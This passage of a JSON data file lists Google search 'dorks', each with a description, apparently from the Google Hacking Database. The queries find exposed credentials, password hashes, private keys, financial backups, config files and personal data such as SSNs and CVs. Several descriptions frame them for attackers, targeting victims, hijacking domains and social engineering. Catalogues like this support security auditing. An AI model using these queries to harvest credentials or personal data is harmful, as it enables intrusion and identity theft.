an SSN in the document."}, {"dork": "filetype:QDF QDF", "description": "The QDATA.QDF file (found sometimes in zipped \"QDATA\" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc. This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online."}, {"dork": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", "description": "storing emails in your webtree isnt a good idea.with this search google will show files containing emails like mail,eml,mbox or mbx with the keywords\"password\" or \"subject\" in the mail data."}, {"dork": "filetype:qbb qbb", "description": "This search will show QuickBooks Bakup Files. Quickbook is financial accounting software so storing these files in a webtree is not a smart idea."}, {"dork": "filetype:bkf bkf", "description": "This search will show backupfiles for xp/2000 machines.Of course these files could contain nearly everything, depending on the user selection and they can also be password protected."}, {"dork": "inurl:snitz_forums_2000.mdb", "description": "The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says: \"it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name.\"Of course, we know readme's are for lamers.. right admins ?[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]1,1,\"adminadmin\",\"58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e\",\"yourmail@server.com\",\" \",\" \",\"\",\"\",1,1,1,3,\" \",\" \",\" \",\"20030918120147\",2,\"20030918120207\",\"20030918120224\",\"Forum Admin\",\"10.xx.xx.72\",0,0,1,\"000.000.000.000\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\" \",\" \",\"\",\"\",\" \",\"\",\"\",\"\",\"\",1(data xx'd at some points) The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt"}, {"dork": "filetype:rdp rdp", "description": "These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols."}, {"dork": "filetype:reg \"Terminal Server Client\"", "description": "These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses."}, {"dork": "filetype:pot inurl:john.pot", "description": "John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)PS: This was posted to the \"fun\" forum, so don't take this too seriously !"}, {"dork": "filetype:pdb pdb backup (Pilot | Pluckerdb)", "description": "Hotsync database files can be found using \"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your \"x:\\palm\\{username}\\backup\"The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).Currently we don't know of a program to \"read\" these binary files."}, {"dork": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", "description": "This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse."}, {"dork": "inurl:\"/names.nsf?OpenDatabase\"", "description": "This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. Most of them are password protected."}, {"dork": "ext:log \"Software: Microsoft Internet Information Services *.*\"", "description": "Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..Examples:12:09:37 194.236.57.10 [2501]USER micze 33112:09:38 194.236.57.10 [2501]PASS - 23008:30:38 194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30 200.16.212.225 activeip\\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -"}, {"dork": "filetype:vcs vcs", "description": "Filext.com says: \"Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written.\"The most common use is the \"vCalendar File\", used by Outlook for example. It can also belong to a \"Palm vCal Desktop Application\". For those who prefer clean searches, try these variations (with less results):\"PRODID: PalmDesktop Generated\"filetype:vcs VCALENDAR filetype:vcs BEGIN:VCALENDAR"}, {"dork": "filetype:pst inurl:\"outlook.pst\"", "description": "All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure."}, {"dork": "ext:ldif ldif", "description": "www.filext.com says LDIF = LDAP Data Interchange Format.LDAP is used for nearly everything in our days, so this file may include some juice info for attackers. They can add INTEXT:keyword to get more specific targets."}, {"dork": "inurl:/_layouts/settings", "description": "With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full \"Edit, Add and Delete access\" to the information, which in case of malicious users may cause loss of important data."}, {"dork": "+\":8080\" +\":3128\" +\":80\" filetype:txt", "description": "With the string [+\":8080\" +\":3128\" +\":80\" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep... The script proxytest.sh is on my website:http://rawlab.relay.homelinux.net/programmi/proxytest.sh"}, {"dork": "intext:SQLiteManager inurl:main.php", "description": "sQLiteManager is a tool Web multi-language of management of data bases SQLite. # Management of several data base (Creation, access or upload basic) # Management of the attached bases of donn\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a8es # Creation, modification and removal of tables and index. # Insertion, modification, suppression of recording in these tables"}, {"dork": "inurl:odbc.ini ext:ini -cvs", "description": "This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever."}, {"dork": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", "description": "ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site."}, {"dork": "\"Installed Objects Scanner\" inurl:default.asp", "description": "Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components. Just place the script on your server and view it in your browser to check your server for all currently known components."}, {"dork": "ext:ini intext:env.ini", "description": "This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more."}, {"dork": "ext:mdb inurl:*.mdb inurl:fpdb shop.mdb", "description": "The directory \"http:/xxx/fpdb/\" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.One of them is Metacart, who used \"shop.mdb\" as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time of writing. Remove the shop.mdb part to see the complete list of databases."}, {"dork": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", "description": "Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path."}, {"dork": "intitle:\"index.of *\" admin news.asp configview.asp", "description": "With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cnews.mdb\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.The database contains the plain text password. PS: this search is based on the index.of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way."}, {"dork": "ext:nsf nsf -gov -mil", "description": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.This is a generic search for Lotus Domino files. It identifies Domino users. Search the GBDB for more variations on this theme."}, {"dork": "inurl:log.nsf -gov", "description": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.Example: * Database-Sizes * Database-Usage * Mail Routing Events * Miscellaneous Events * NNTP Events * Object Store Usage * Passthru Connections * Phone Calls-By Date * Phone Calls-By User * Replication Events * Sample Billing * Usage-By Date * Usage-By UserExample:2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied"}, {"dork": "intitle:\"Index of\" upload size parent directory", "description": "Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff."}, {"dork": "intitle:\"Web Server Statistics for ****\"", "description": "These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages, SQL statements, etc."}, {"dork": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", "description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigationThis reveals the RSS info for the user calendars."}, {"dork": "filetype:inf inurl:capolicy.inf", "description": "The CAPolicy.inf file provides Certificate Servicces configuration information, which is read during initial CA installation an whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchiy."}, {"dork": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", "description": "Certificate Practice Statement (CPS)A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on on the certificates issued by the CA."}, {"dork": "ext:conf NoCatAuth -cvs", "description": "NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes."}, {"dork": "ext:cgi inurl:editcgi.cgi inurl:file=", "description": "This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)http://www.k-otik.com/exploits/08242004.Axis.sh.php"}, {"dork": "filetype:ns1 ns1", "description": "Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +\"Creator\" +\"Format\" +\"DateGMT\"."}, {"dork": "filetype:config web.config -CVS", "description": "Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site. This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error."}, {"dork": "filetype:myd myd -CVS", "description": "MySQL stores its data for each database in individual files with the extension MYD.An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database."}, {"dork": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", "description": "PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory."}, {"dork": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", "description": "The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm"}, {"dork": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", "description": "This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well."}, {"dork": "inurl:report \"EVEREST Home Edition \"", "description": "Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info. I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff. This one just gives out to much to list, so go have a look and see what you can find."}, {"dork": "intitle:\"DocuShare\" inurl:\"docushare/dsweb/\" -faq", "description": "some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know."}, {"dork": "intitle:\"PHP Advanced Transfer\" (inurl:index.php | inurl:showrecent.php )", "description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the main and recently changed files pages."}, {"dork": "ext:gho gho", "description": "Norton Ghost allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!"}, {"dork": "ext:pqi pqi -database", "description": "PQ DriveImage allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!"}, {"dork": "ext:vmdk vmdk", "description": "VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything."}, {"dork": "ext:vmx vmx", "description": "VMWare allows PC emulation across a variety of platforms. Theseconfiguration files describe a virtual PC, and reveal information about that PC's hardware settings."}, {"dork": "inurl:\"/axs/ax-admin.pl\" -script", "description": "This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats."}, {"dork": "\"Generated by phpSystem\"", "description": "PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts."}, {"dork": "ext:dat bpk.dat", "description": "Perfect Keylogger is as the name says a keylogger :)This dork finds the corresponding datafiles which can be read with the free downloadable lite version."}, {"dork": "inurl:ds.py", "description": "Affordable Web-based document and content management application lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk"}, {"dork": "ext:conf inurl:rsyncd.conf -cvs -man", "description": "rsync is an open source utility that provides fast incremental file transfer.rsync can also talk to \"rsync servers\" which can provide anonymous or authenticated rsync.The configuration files contain data about peers and paths"}, {"dork": "inurl:preferences.ini \"[emule]\"", "description": "This finds the emule configuration file which contains some general and proxy information.Sometimes proxy user and password are stored."}, {"dork": "intitle:\"welcome.to.squeezebox\"", "description": "squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.This is neat, on top of giving out all sorts of enumeration information, it also allows one to paruse the music collection on the box, as well as listen if you install the aplet. Way cool."}, {"dork": "filetype:cnf inurl:_vti_pvt access.cnf", "description": "The access.cnf file is a \"weconfigfile\" (webconfig file) used by Frontpage Extentions for Unix. The install script called change_server.sh processes them. These files leak information about the realm name and the full path on the server for it."}, {"dork": "intitle:\"index.of\" .diz .nfo last modified", "description": "File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distroubtion site for pirated software. .nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives."}, {"dork": "intext:gmail invite intext:http://gmail.google.com/gmail/a", "description": "This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding \"+blog\", \"+livejournal\", or , \"+forum\"."}, {"dork": "intitle:\"FTP root at\"", "description": "This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password."}, {"dork": "ext:txt inurl:dxdiag", "description": "This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implacations of this data, but I'll leave it to your imagination."}, {"dork": "ext:reg \"username=*\" putty", "description": "Putty registry entries. Contain username and hostname pairs, as well as type of session (sftp, xterm, etc)."}, {"dork": "intitle:\"edna:streaming mp3 server\" -forums", "description": "Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).Stats pages were found (by klouw) with:\"edna:*\" intitle:\"edna: Site Statistics\""}, {"dork": "inurl:netscape.ini", "description": "There's a bunch of interesting info in netscape.ini1. Viewers: which multimedia viewers the firm or people are using2.Cookies3.Address Book4.Mail- If pop3 is used you will see login and password. 5.Java - will tell the attacker if his victim has Java enabled.6.URL History - The last sites visitedURL_1=http://edtech.xxxx.fi/URL_2=C:\\Tx\\ixxx_t3.htmURL_3=http://www.xxx.com/welcome/URL_4=http://xxx.netscape.com7.User Trusted External Applications"}, {"dork": "inurl:netscape.hst", "description": "Netscape Bookmark List/History: So an attacker would be able to locate the bookmark and history list"}, {"dork": "inurl:netscape.hst", "description": "History for Netscape - So an attacker can read a user's browsing history."}, {"dork": "-site:php.net -\"The PHP Group\" inurl:source inurl:url ext:pHp", "description": "scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open configuration files ;-)"}, {"dork": "+\"HSTSNR\" -\"netop.com\"", "description": "This search reveals NetOp license files. From the netop website: \"NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2t terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console.\""}, {"dork": "inurl:getmsg.html intitle:hotmail", "description": "These pages contain hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords."}, {"dork": "filetype:ora tnsnames", "description": "This searches for tns names files. This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing. This file contains ports, IP's and server names of these database machines. What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling."}, {"dork": "\"#mysql dump\" filetype:sql 21232f297a57a5a743894a0e4a801fc3", "description": "this is a mod of one of the previous queries posted in here. the basic thing is, to add this:21232f297a57a5a743894a0e4a801fc3to your query, that oryginally results in a username lists with a MD5 encrypted password.this one finds mysql dumps with for a users who's passwordsare \"admin\" :)the \"21232f297a57a5a743894a0e4a801fc3\" is md5 result for \"admin\"you can try it with other queris on this site.use also:63a9f0ea7bb98050796b649e85481845 for root098f6bcd4621d373cade4e832627b4f6 for test3c3662bcb661d6de679c636744c66b62 for sexf561aaf6ef0bf14d4208bb46a4ccb3ad for xxxif you'll get lucky, you'll get a username, and a encryoted password, witch is the one above that u used.remember, that this works for all files that contain plaintex username and md5 encrypted passwords. use this techniq with other queris that you'll find hereuff... i hope i made my self clear."}, {"dork": "allinurl:\"weblog/referrers\"", "description": "ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs."}, {"dork": "\"MacHTTP\" filetype:log inurl:machttp.log", "description": "MacHTTP is an webserver for Macs running OS 6-9.x. It's pretty good for older Macs but the default install leaves the MacHTTP.log file open to access."}, {"dork": "ext:ics ics", "description": "ICalender Fileder that can contain a lot of useful information about a possible target."}, {"dork": "ext:plist filetype:plist inurl:bookmarks.plist", "description": "These Safari bookmarks that might show very interesting info about a user's surfing habits"}, {"dork": "ext:jbf jbf", "description": "There is a full path disclosure in .jbf files (paint shop pro), which by itself is not a vulnerability, but it becomes interesting when uploaded or used on webservers. Use a tool like 'strings' to read the ascii parts, the path is on the top of the file."}, {"dork": "inurl:XcCDONTS.asp", "description": "This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious!"}, {"dork": "filetype:QBW qbw", "description": "Quickbooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. Its a nice software package but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection. SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available. This could lead to identity theft, or worse..."}, {"dork": "filetype:PS ps", "description": "PS is for \"postscript\"...which basically means you get the high quality press data for documents. Just run 'adobe distiller' or alike to produce a readable PDF. Found items include complete books as sold on amazon, annual reports and even juicier stuff."}, {"dork": "site:www.mailinator.com inurl:ShowMail.do", "description": "Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address which can be randomized."}, {"dork": "intitle:\"curriculum vitae\" filetype:doc", "description": "Hello. 1. It reveals personal datas, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many verions of it:inurl:\"pl\" intitle:\"curriculum vitae\" filetype:docinurl:\"uk\" intitle:\"curriculum vitae\" filetype:docinurl:\"nl\" intitle:\"curriculum vitae\" filetype:doc, etc. in order to get national results,alsointitle:\"curriculum vitae\" ext:(doc | rtf )However filetype:doc version gives the most results. 2. You can always do someting with someone phone number, date and place of birth, etc. I placed this string in the forum, but nobody answered me :(. GreetingsphilYps. you have something similar in your GHDB, but different.\"Click here for the Google search ==> \"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"(opens in new window)Added: Thursday, August 19, 2004hits: 24771\""}, {"dork": "contacts ext:wml", "description": "Forget Bluetooth Hacking! You'll be amazed, at how many people sync their Cell Phones to the same Computers they run some type of Server on. This Query literally gives you access to peoples private contact lists that are ether on there Smart Phones', or on their Windows CE wireless devices.An attacker could Spoof Emails with the \"SIG\" details of the persons Phone firmware, or simply collect the cellular numbers for something later on down the road.I even hypotheticlly came across some private text messages!"}, {"dork": "rdbqds -site:.edu -site:.mil -site:.gov", "description": "Ceasar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word \"secret\" which equals rdbqds.. (1 char shift).It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. A big thank you to Golfo for the links he provided in the forum to assist.http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html"}, {"dork": "inurl:wp-mail.php + \"There doesn't seem to be any new mail.\"", "description": "This is the WordPress script handling Post-By-Email functionality, the search is focussed on the message telling that there's nothing to process.If the script *does* have anything to progress, it will reveal the email-address of account that sent the message(s)."}, {"dork": "\"not for public release\" -.edu -.gov -.mil", "description": "if you search through lots of these then you find some really juicy things, there files from police, airports, government companies all kind of stuff that is not meant to be seen by normal people."}, {"dork": "intitle:\"Joomla - Web Installer\"", "description": "Joomla! is a Content Management System (CMS) created by the same team that brought the Mambo CMS. This dork finds the Web Installer page. On newer versions, after you install, joomla asks to delete installation dir before to be functional.The Webinstaller gives an attacker information about the php configuration and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).The admin logon can be found searching: intitle:\"- Administration [Joomla]\" but there are no default passwords."}, {"dork": "(intitle:\"PRTG Traffic Grapher\" inurl:\"allsensors\")|(intitle:\"PRTG Traffic Grapher - Monitoring Results\")", "description": "PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network like memory and CPU utilizations."}, {"dork": "inurl:configuration.php-dist", "description": "locates the default configuration file of JOOMLA Author: ScOrPiOn"}, {"dork": "inurl:\"config.php.new\" +vbulletin", "description": "locates the default configuration file for vBulletin (/includes/config.php.new) Author: MaXe"}, {"dork": "inurl:phpinfo.php", "description": "Locates phpinfo files. A phpinfo file Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment , the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License. Author: ScOrPiOn"}, {"dork": "allinurl:/xampp/security.php", "description": "XAMPP Security Setting Page Information Disclosure. Author: modpr0be"}, {"dork": "inurl:app/etc/local.xml", "description": "Magento local.xml sensitive information disclosure\nAuthor: Rambaud Pierre"}, {"dork": "allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "description": "Site: google.com/latitude - This is a free application where you can track\nyour PC, laptop and mobile, just login there and you will be tracked\nfreely(used to track yourself live and you can put this in blogs to show\nwhere you are)\nI made a dork simply that shows some couple of people, after some years when\nthis application will grow stronger and you can get tons of victims.\n*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*\nBy *The ALLSTAR*"}, {"dork": "filetype:xls + password + inurl:.com", "description": "The filetype:xls never changes\nWhat is inbtween then + sings can be what ever you are looking for\ntaxid\nssn\npassword\nStudent ID\netc\nThe inurl: can be changed to what you want\n.gov\n.edu\n.com\netc.\nTake care,\nRedShift"}, {"dork": "inurl:sarg inurl:siteuser.html", "description": "Submitter: pipefish \nSquid User Access Reports that show users' browsing history through\nthe proxy. Shows internal IP space sometimes, usernames as well, and can\nbe helpful when planning a pen test (spear phishing\\social engineering\ncampaign etc.) It also helps to ID an organization's proxy server."}, {"dork": "site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "description": "Searches Dropbox for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack.\nAuthor: Trevor Starick"}, {"dork": "site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "description": "Searches GoogleDocs for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack.\n--\nTrevor Starick"}, {"dork": "site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "description": "Searches Mediafire for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack\n-- \nTrevor Starick"}, {"dork": "site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "description": "Searches StashBox for publicly avaliable PDF's or .doc files\ncontaining information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack\n--\nTrevor Starick"}, {"dork": "inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "description": "iphone apple push notification system private keys, frequently unencrypted,\nfrequently with DeviceIDs in same dir"}, {"dork": "inurl:server-info intitle:\"Server Information\" Apache Server Information", "description": "Juicy information about the apache server installation in the website.\n-- \n*Regards,\nFady Mohammed Osman.*"}, {"dork": "filetype:pem \"Microsoft\"", "description": "Microsoft private keys, frequently used for servers with UserID on the same\npage.\n--\nShamanoid"}, {"dork": "+intext:\"AWSTATS DATA FILE\" filetype:txt", "description": "Shows data downloads containing statistics on the site.Made by AwstatsThe best dork for that system.By: 67pc"}, {"dork": "inurl:\"trace.axd\" ext:axd \"Application Trace\"", "description": "example google dork to find trace.axd, a file used for debugging asp that\nreveals full http request details like cookie and other data that in many\ncases can be used to hijack user-sessions, display plain-text\nusernames/passwords and also serverinfo like pathnames\nsecond with plain-text usernames and passwords along with sessiondata. this\nfile should be developer-only and not publicly available but seems to be\nused quite often, usually hidden from google with robots.txt. Author: easypwn"}, {"dork": "inurl:\"/includes/config.php\"", "description": "The Dork Allows you to get data base information from config files. Author: XeNon"}, {"dork": "intitle:index.of? configuration.php.zip", "description": "this dork finds mostly backed up configuration.php files.\nIts possible to change the *.zip to *.txt or other file types.\nAuthor: Lord.TMR"}, {"dork": "filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "description": "this dork locates backed up config files\nfiletype:php~ (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:inc~ (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:inc (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:bak (define)(DB_USER|DB_PASS|DB_NAME)\n \nAuthor: Gerald J. Pottier III"}, {"dork": "filetype:old (mysql_connect) ()", "description": "There are three of mysql_connects but that all search in .inc or\nwarnings, non search for .old . Dot old is something that all devs to\nto hide old files they do not want to delete immediatly but almost\nalways forget to delete. The server lang can be changed.\n:D\n-- \nGerald J. Pottier III\nSenior Managed Systems Engineer :STG inc.\nHereford, AZ 85615\n[Home] 520.843.0135\n[Work] 520.538.9684"}, {"dork": "Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )", "description": "This dork locates social security numbers. Author: Luciano UNLP"}, {"dork": "List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls", "description": "This is a dork for a list of Phone Private Numbers in Argentina. Author: Luciano UNLP"}, {"dork": "allintext:D.N.I filetype:xls", "description": "This Query contains sensitive data (D.N.I ;-) ) in a xls format (excel) and D.N.I for People of the Anses !\nAuthor: Luciano UNLP"}, {"dork": "intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "description": "This dork can fetch you Avast product licenses especially Avast Antiviruses\n, including Professional editions ;)\nAuthor: gr00ve_hack3r\nwww.gr00ve-hack3r.com"}, {"dork": "filetype:docx Domain Registrar $user $pass", "description": "Dork :- *filetype:docx Domain Registrar $user $pass*\nUse :- *To find domain login password for Registrar (can Hijack Domain)\nSubmitted by : G00g!3 W@rr!0r\n*"}, {"dork": "inurl:.com/configuration.php-dist", "description": "Finds the configuration files of the PHP Database on the server.\nBy\nChintan GurjarRahul Tygi"}, {"dork": "inurl:newsnab/www/ automated.config.php", "description": "Usenet Accounts from Newsnab configs\ninurl:newsnab/www/ automated.config.php\nAuthor: rmccurdy.com\nyay free newsgroup access !\n***********************************************************************\nThe information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended 